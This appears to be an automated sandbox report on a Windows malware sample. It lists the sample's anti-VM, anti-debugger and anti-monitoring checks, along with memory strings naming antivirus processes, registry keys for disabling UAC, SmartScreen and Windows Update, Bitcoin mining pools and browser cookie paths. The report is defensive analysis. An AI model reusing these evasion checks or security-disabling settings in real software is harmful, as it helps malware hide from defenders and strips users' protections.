SECURITYSOFTWARE\SYMANTEC\INSTALLEDAPPSSYMANTECNORTONSYMERR.EXE.EXENIS.EXENAV.EXEN360.EXENS.EXE.EXNIS.EXENAV.EXEENDPOINT PROTECTIONNAVWNT.EXECLTLMH.EXEAVAST! ANTIVIRUSAVASTAVASTUI.EXESETUPAVASTUI.EXEAVASTEMUPDATE.EXEAVASTSVC.EXEASHUPD.EXEASHQUICK.EXESCHED.EXEINSTUP.EXEAVASTPROGRAM \PROGRAM FILES\AVT SOFARE\AV\AUI.EXEAVTSVC.EXEAVTMUPD.EXEASPD.EXEASUIK.EXESCHD.EXESETP\INTP.EXESETP\ABUGRPRT.EXE.EXEWRSA.EXEWRSVCZATRAY.EXEFORCEFIELD.EXEZONEALARMUPDATING.DLLFSHOSTER32.EXEFSHOSTERFSAUA.DLLPSUNMAIN.EXEPSUAMAINPSUNSCAN.DLLPSANUPGMGR.DLLPSUAMAIN.EXEPSANCU.EXESOFTWARE\PANDA SOFTWAREPAVJOBS.EXEAVENGINE.EXEUPGRADER.EXEAD-AWARE SERVICELAVASOFTADAWARESERVICE11ADAWARE.EXEADAWARESERVICE.EXEBULLGUARDBULLGUARD.EXE.MANIFESTBULLGUARDUPDATE.EXEBULLGUARD.EXEBULLGUARDSCANNER.EXEBULLGUARDBHVSCANNER.EXEBULLGUARDUPDATE2.EXEBGSCAN.EXEBGSCANENGINE.DLLRSMGRSVC.MANIFESTUPDATER.EXEBACKUP\RSD\RSSETUP\UPDATER.EXERSTRAY.EXERAVMOND.EXERSMGRSVC.EXERSMAIN.EXEINSTALLPATHSOFTWARE\RISING\RAVRSSCAN.DLLRSTRAY.DLLMBAMSERVICEMBAMGUI.EXEMBAMDOR.EXEMBAM.EXEMBAMSERVICE.EXEMBAMSCHEDULER.EXEPCTSGUI.EXEPCTSAUXS.EXEPCTSSVC.EXEISTRAYUPDATE.EXEUPDATEHLPR.DLLSBAMTRAYSBAMUI.EXESBAMTRAY.EXEDEFINITIONS\VCORE.DLLF-PROT ANTIVIRUS TRAY APPLICATIONUPDATER_CLIENT_MOD.DLLFPROTTRAY.EXEFPWIN.EXESOPHOS AUTOUPDATE MONITORDATA PATH

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	RDTSC instruction interceptor: First address: 000000000083695A second address: 000000000083695E instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	RDTSC instruction interceptor: First address: 000000000083695E second address: 000000000083695E instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FAF60F7123Ch 0x00000006 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 00000000006B68FA second address: 00000000006B68FE instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 00000000006B68FE second address: 00000000006B68FE instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FAF60F7123Ch 0x00000006 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 000000000065CE62 second address: 000000000065CE66 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 000000000065CE66 second address: 000000000065CE66 instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FAF60F7123Ch 0x00000006 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 00000000005DCBF2 second address: 00000000005DCBF6 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 00000000005DCBF6 second address: 00000000005DCBF6 instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FAF60F7123Ch 0x00000006 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 00000000005FCC22 second address: 00000000005FCC26 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	RDTSC instruction interceptor: First address: 00000000005FCC26 second address: 00000000005FCC26 instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FAF60F7123Ch 0x00000006 rdtsc

Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	File opened / queried: VBoxGuest	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\prl_boot.sys	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\vmhgfs.sys	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	File opened / queried: HGFS	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\vboxguest.sys	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\vboxvideo.sys	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0

Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 1114	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 1092	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 1060	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 1019	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 782	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 744
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 698
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 664
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 627
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Window / User API: threadDelayed 598

Source: C:\Windows\SysWOW64\explorer.exe TID: 380	Thread sleep time: -59500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5528	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6080	Thread sleep time: -64000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6080	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 1384	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5764	Thread sleep count: 1114 > 30	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5764	Thread sleep time: -66840s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4300	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4740	Thread sleep count: 1092 > 30	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4740	Thread sleep time: -65520s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5852	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5696	Thread sleep count: 1060 > 30	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5696	Thread sleep time: -63600s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5068	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5516	Thread sleep count: 1019 > 30	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5516	Thread sleep time: -61140s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5872	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4652	Thread sleep count: 782 > 30	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4652	Thread sleep time: -46920s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5240	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5668	Thread sleep count: 744 > 30
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5668	Thread sleep time: -44640s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4904	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5600	Thread sleep count: 698 > 30
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5600	Thread sleep time: -41880s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 592	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 580	Thread sleep count: 664 > 30
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 580	Thread sleep time: -39840s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5532	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4580	Thread sleep count: 627 > 30
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 4580	Thread sleep time: -37620s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 5256	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 3176	Thread sleep count: 598 > 30
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe TID: 3176	Thread sleep time: -35880s >= -30000s

Source: C:\Windows\SysWOW64\explorer.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310354140.000000000082A000.00000004.00000020.sdmp	Binary or memory string: \\.\HGFS
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310354140.000000000082A000.00000004.00000020.sdmp	Binary or memory string: \??\HGFS
Source: gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: Software\VMware, Inc.
Source: gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: Starttooltips_class32%c:\usb20.sys%c:\*pp.exe%c:\%s%c:\pp.exe.lnk%WinDir%\explorer.exe /C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnk{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}VisthAux.exesnxhk.dllSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Classes\originjagexcacheSOFTWARE\Blizzard Entertainment.minecraftLeague of LegendsSoftware\SkypeSoftware\Microsoft\VisualStudioSoftware\VMware, Inc.SOFTWARE\AdwCleanerSOFTWARE\Safer Networking Limited\Spybot - Search & Destroy 2Software\Classes\VirtualStore\MACHINE\SOFTWARE\TrendMicro\HijackThisComboFixLinhaDefensivaHouseCallLanguageSoftware\Valve\SteamMRU0Software\Microsoft\Terminal Server Client\Default%08x:\nortonsymantecsecurityantivirustest_uac_1.exesetup.exerunonce.exe__restartWmiPrvSE.execomctl32.dllGetAddrInfoWGetAddrInfoExWwintrust.dllWinVerifyTrustNtOpenProcessNtCreateFileNtOpenFileNtSetValueKeyNtDeleteValueKeySOFTWARESYSTEM\CurrentControlSet\servicesEnableLUASOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Systemcmd.exe /c start "" "%s" "" DisableSRSOFTWARE\Policies\Microsoft\Windows NT\SystemRestoremrtstub.exe"%s"VersionCheckEnabledSoftware\Microsoft\Windows\CurrentVersion\Policies\ExtEnableJavaUpdateSOFTWARE\JavaSoft\Java Update\PolicySOFTWARE\Wow6432Node\JavaSoft\Java Update\PolicyiCheckReaderSOFTWARE\Adobe\Adobe ARM\1.0\ARMSOFTWARE\Wow6432Node\Adobe\Adobe ARM\1.0\ARMDisableWindowsUpdateAccessSoftware\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdateEnableBalloonTipsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedEnableSmartScreenSOFTWARE\Policies\Microsoft\Windows\SystemSmartScreenEnabledSOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerOff%S\%S\%S\%pgoogle.comwindowsupdate.microsoft.commicrosoft.comupdate.microsoft.comwinmgr108.exemsiexec.exewuauclt.exesvchost.exestratum-ubtcguildpool.itzod.rubitcoinpool.compool0.btcdig.comtriplemining.com.bitparking.commining.eligius.st.bitcoin.czmint.bitminter.compool_addresstcp://-pscryptsha256solid-a http-t @-x socks=wscript.execscript.exevbc.exerundll32.exeregsvr32.exe%ALLUSERSPROFILE%SOFTWARE\Microsoft\CurrentVersion\RunSOFTWARE\Microsoft\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSystemcsrss.exelsass.exesmss.exewinlogon.exeservices.exekernel32.dll.ini.sys%s\%08x.lnk\regsvr32.exe\rundll32.exe\wscript.exe\cscript.exewscript.exe / cscript.exe wscript ~explorer.exedesktop.ini javascript:\mshtml,<script>%08xSOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsLoadWinlogonSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon ,{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}{2faba4c7-4da9-4013-9697-20cc3fd40f85}\CLSID\%S\InprocServer32Wow6432Node\CLSID\%S\InprocServer32Software\Microsoft\Windows\CurrentVersion\Ext\SettingsP: %u // RPE: %u // T: %u // F: %u // MNR: %u // AS: %u // BHO: %u // // vAntiBot() :: Abruptly exited due to update task%s%s_%p%08x%08x%08x%08xSoftware\AppDataLow\Software\%s\%08XSoftware\AppDataLow\Software\%s\%08X\%s.rdatachrome.dllPOSTposthttpHTTP
Source: gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: SbieDll.dllapi_log.dlldir_watch.dll%02XEVERYONECURRENT_USER0x%08XSB:0x%08XG:%s_0x%08X_%c:%s_v1$G:%S_0x%08XOPENmscoree.dllSoftware\Microsoft\Internet Explorer\MainSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u2500IsolationPMILNoProtectedModeBanneryesCheck_AssociationsSOFTWARE\Microsoft\Internet Explorer\MainIEXPLORE.EXESOFTWARE\Clients\StartMenuInternetIE.HTTPProgidSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceIE.HTTPSSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoiceIE.AssocFile.HTMchrome.exefirefox.exeopera.exesafari.exe360browser.exemaxthon.exesvcVersionSOFTWARE\Microsoft\Internet ExplorerVersionCurrentVersionSoftware\Mozilla\Mozilla FirefoxHTTP\shell\open\commandStart PageApplications\iexplore.exe\shell\open\commandiex(x86)%s\Internet Explorer\iexplore.exeSoftware\Microsoft\Windows\CurrentVersion\Ext\Settings\%sFlagscookie:Mozilla\Firefox\Profilescookies.sqliteErp~dcen7Zxy~cxe7:7Dnd~ycreyv{d-7```9dnd~ycreyv{d9txzX[[NSUPDxqc`verK^zzby~cn7^ytPZREZxy~cxe~yp7:7VG^7Zxy~cxe7a%7$%:u~cGEXTZXYH@^YSX@HT[VDDC^sv@~ysx`DNDCRZKTxycex{Drc''&Kdrea~trdKS~d\|KRybzaz`verauxoDNDCRZKTbeerycTxycex{DrcKdrea~trdKAZ`verDXQC@VERKAZ`ver;7^yt90Libraryindotaskmgr.exeprocexp.exe\DesktopDocuments%s\winsxs\x86_microsoft.windows.common-controls_6.0._*%s\winsxs\%s\comctl32.dllK32GetMappedFileNameWPsapi.dllGetMappedFileNameWSystemManufacturerHARDWARE\DESCRIPTION\System\BIOSvMwARSystemBiosVersionHARDWARE\DESCRIPTION\SystemvBoXdriversvboxvideo.sysvboxguest.sysvmhgfs.sysprl_boot.sysJJ8J^QPEJJ8J@TynQcsebcmd.exeProcessorNameStringHARDWARE\DESCRIPTION\System\CentralProcessor\0dg_ssudbusApple Mobile DeviceSOFTWARE\Microsoft\Windows NT\CurrentVersion%s\%sdeployment.security.level=MEDIUM
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310354140.000000000082A000.00000004.00000020.sdmp	Binary or memory string: \??\VBoxGuestp
Source: 935aa375omok5c.exe	Binary or memory string: vmhgfs.sys
Source: explorer.exe, 0000000B.00000003.579179984.00000000007F2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: 935aa375omok5c.exe	Binary or memory string: vboxguest.sys
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310412159.000000000085B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Show sources

Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Open window title or class name: procmon_window_class
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Open window title or class name: tidawindow
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Open window title or class name: monitoring - api monitor v2 32-bit
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Open window title or class name: ollydbg

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort	Jump to behavior
